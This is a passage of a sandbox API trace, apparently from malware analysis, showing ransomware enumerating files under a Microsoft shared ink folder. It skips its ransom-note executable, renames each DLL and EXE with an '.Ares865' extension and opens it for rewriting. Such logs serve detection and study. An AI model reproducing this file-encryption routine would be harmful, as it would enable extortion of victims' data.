ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5376d0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5376d0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0150.835] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0150.835] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0150.835] lstrcpyW (in: lpString1=0x2cce472, lpString2="1.0" | out: lpString1="1.0") returned="1.0" [0150.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0150.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f00d8 [0150.835] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0150.835] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x53793220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53793220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.7", cAlternateFileName="")) returned 1 [0150.835] lstrcmpiW (lpString1="1.7", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0150.835] lstrcmpiW (lpString1="1.7", lpString2="aoldtz.exe") returned -1 [0150.836] lstrcpyW (in: lpString1=0x2cce472, lpString2="1.7" | out: lpString1="1.7") returned="1.7" [0150.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0150.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f0518 [0150.836] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0150.836] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53793220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53793220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0150.836] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0150.836] lstrcmpiW (lpString1="en-US", lpString2="aoldtz.exe") returned 1 [0150.836] lstrcpyW (in: lpString1=0x2cce472, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0150.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0150.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0380 [0150.836] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0150.836] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5376d0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5376d0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0150.836] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0150.836] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa21d9876, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5376d0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5376d0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0150.836] lstrcmpiW (lpString1="HWRCustomization", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0150.836] lstrcmpiW (lpString1="HWRCustomization", lpString2="aoldtz.exe") returned 1 [0150.837] lstrcpyW (in: lpString1=0x2cce472, lpString2="HWRCustomization" | out: lpString1="HWRCustomization") returned="HWRCustomization" [0150.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0150.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x31afc8 [0150.837] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0150.837] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aad17fd, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x2aad17fd, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x959f4c70, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x43200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0150.837] lstrcmpiW (lpString1="InkDiv.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0150.837] lstrcmpiW (lpString1="InkDiv.dll", lpString2="aoldtz.exe") returned 1 [0150.837] lstrcpyW (in: lpString1=0x2cce472, lpString2="InkDiv.dll" | out: lpString1="InkDiv.dll") returned="InkDiv.dll" [0150.837] lstrlenW (lpString="InkDiv.dll") returned 10 [0150.837] lstrlenW (lpString="Ares865") returned 7 [0150.837] lstrcmpiW (lpString1="Div.dll", lpString2="Ares865") returned 1 [0150.837] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll.Ares865") returned 75 [0150.837] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkdiv.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkdiv.dll.ares865"), dwFlags=0x1) returned 1 [0150.839] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkdiv.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.840] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=274944) returned 1 [0150.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0150.859] lstrcpyW (in: lpString1=0x2cce472, lpString2="InkObj.dll" | out: lpString1="InkObj.dll") returned="InkObj.dll" [0150.859] lstrlenW (lpString="InkObj.dll") returned 10 [0150.859] lstrlenW (lpString="Ares865") returned 7 [0150.859] lstrcmpiW (lpString1="Obj.dll", lpString2="Ares865") returned 1 [0150.859] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll.Ares865") returned 75 [0150.859] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkobj.dll.ares865"), dwFlags=0x1) returned 1 [0150.861] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkobj.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.861] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1415168) returned 1 [0150.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0150.937] lstrcpyW (in: lpString1=0x2cce472, lpString2="journal.dll" | out: lpString1="journal.dll") returned="journal.dll" [0150.937] lstrlenW (lpString="journal.dll") returned 11 [0150.937] lstrlenW (lpString="Ares865") returned 7 [0150.937] lstrcmpiW (lpString1="nal.dll", lpString2="Ares865") returned 1 [0150.937] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll.Ares865") returned 76 [0150.937] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\journal.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\journal.dll.ares865"), dwFlags=0x1) returned 1 [0150.941] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\journal.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.941] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=936448) returned 1 [0150.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0150.998] lstrcpyW (in: lpString1=0x2cce472, lpString2="micaut.dll" | out: lpString1="micaut.dll") returned="micaut.dll" [0150.998] lstrlenW (lpString="micaut.dll") returned 10 [0150.998] lstrlenW (lpString="Ares865") returned 7 [0150.998] lstrcmpiW (lpString1="aut.dll", lpString2="Ares865") returned 1 [0150.998] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll.Ares865") returned 75 [0150.998] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\micaut.dll.ares865"), dwFlags=0x1) returned 1 [0151.003] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\micaut.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.003] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1383936) returned 1 [0151.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.074] lstrcpyW (in: lpString1=0x2cce472, lpString2="Microsoft.Ink.dll" | out: lpString1="Microsoft.Ink.dll") returned="Microsoft.Ink.dll" [0151.074] lstrlenW (lpString="Microsoft.Ink.dll") returned 17 [0151.074] lstrlenW (lpString="Ares865") returned 7 [0151.075] lstrcmpiW (lpString1="Ink.dll", lpString2="Ares865") returned 1 [0151.075] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll.Ares865") returned 82 [0151.075] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\microsoft.ink.dll.ares865"), dwFlags=0x1) returned 1 [0151.077] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\microsoft.ink.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.077] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=507904) returned 1 [0151.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.107] lstrcpyW (in: lpString1=0x2cce472, lpString2="mip.exe" | out: lpString1="mip.exe") returned="mip.exe" [0151.107] lstrlenW (lpString="mip.exe") returned 7 [0151.107] lstrlenW (lpString="Ares865") returned 7 [0151.107] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe.Ares865") returned 72 [0151.107] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mip.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mip.exe.ares865"), dwFlags=0x1) returned 1 [0151.110] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mip.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.110] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1221632) returned 1 [0151.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.110] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.171] lstrcpyW (in: lpString1=0x2cce472, lpString2="mraut.dll" | out: lpString1="mraut.dll") returned="mraut.dll" [0151.171] lstrlenW (lpString="mraut.dll") returned 9 [0151.171] lstrlenW (lpString="Ares865") returned 7 [0151.171] lstrcmpiW (lpString1="aut.dll", lpString2="Ares865") returned 1 [0151.171] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll.Ares865") returned 74 [0151.171] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mraut.dll.ares865"), dwFlags=0x1) returned 1 [0151.174] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mraut.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.174] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6283264) returned 1 [0151.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.364] lstrcpyW (in: lpString1=0x2cce472, lpString2="mshwgst.dll" | out: lpString1="mshwgst.dll") returned="mshwgst.dll" [0151.364] lstrlenW (lpString="mshwgst.dll") returned 11 [0151.364] lstrlenW (lpString="Ares865") returned 7 [0151.364] lstrcmpiW (lpString1="gst.dll", lpString2="Ares865") returned 1 [0151.364] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll.Ares865") returned 76 [0151.364] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwgst.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwgst.dll.ares865"), dwFlags=0x1) returned 1 [0151.367] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwgst.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.367] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44032) returned 1 [0151.367] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.373] lstrcpyW (in: lpString1=0x2cce472, lpString2="mshwLatin.dll" | out: lpString1="mshwLatin.dll") returned="mshwLatin.dll" [0151.373] lstrlenW (lpString="mshwLatin.dll") returned 13 [0151.373] lstrlenW (lpString="Ares865") returned 7 [0151.373] lstrcmpiW (lpString1="tin.dll", lpString2="Ares865") returned 1 [0151.373] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll.Ares865") returned 78 [0151.373] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwlatin.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwlatin.dll.ares865"), dwFlags=0x1) returned 1 [0151.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwlatin.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.375] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=812544) returned 1 [0151.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.417] lstrcpyW (in: lpString1=0x2cce472, lpString2="penchs.dll" | out: lpString1="penchs.dll") returned="penchs.dll" [0151.417] lstrlenW (lpString="penchs.dll") returned 10 [0151.417] lstrlenW (lpString="Ares865") returned 7 [0151.417] lstrcmpiW (lpString1="chs.dll", lpString2="Ares865") returned 1 [0151.417] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll.Ares865") returned 75 [0151.417] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penchs.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penchs.dll.ares865"), dwFlags=0x1) returned 1 [0151.420] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penchs.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.420] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1536) returned 1 [0151.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.423] lstrcpyW (in: lpString1=0x2cce472, lpString2="pencht.dll" | out: lpString1="pencht.dll") returned="pencht.dll" [0151.423] lstrlenW (lpString="pencht.dll") returned 10 [0151.423] lstrlenW (lpString="Ares865") returned 7 [0151.423] lstrcmpiW (lpString1="cht.dll", lpString2="Ares865") returned 1 [0151.424] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll.Ares865") returned 75 [0151.424] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pencht.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pencht.dll.ares865"), dwFlags=0x1) returned 1 [0151.425] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pencht.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.425] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1536) returned 1 [0151.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.426] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.426] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.428] lstrcpyW (in: lpString1=0x2cce472, lpString2="penjpn.dll" | out: lpString1="penjpn.dll") returned="penjpn.dll" [0151.428] lstrlenW (lpString="penjpn.dll") returned 10 [0151.428] lstrlenW (lpString="Ares865") returned 7 [0151.428] lstrcmpiW (lpString1="jpn.dll", lpString2="Ares865") returned 1 [0151.429] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll.Ares865") returned 75 [0151.429] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penjpn.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penjpn.dll.ares865"), dwFlags=0x1) returned 1 [0151.431] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penjpn.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1536) returned 1 [0151.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0151.435] lstrcpyW (in: lpString1=0x2cce472, lpString2="penkor.dll" | out: lpString1="penkor.dll") returned="penkor.dll" [0151.435] lstrlenW (lpString="penkor.dll") returned 10 [0151.435] lstrlenW (lpString="Ares865") returned 7 [0151.435] lstrcmpiW (lpString1="kor.dll", lpString2="Ares865") returned 1 [0151.435] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll.Ares865") returned 75 [0151.435] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penkor.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft 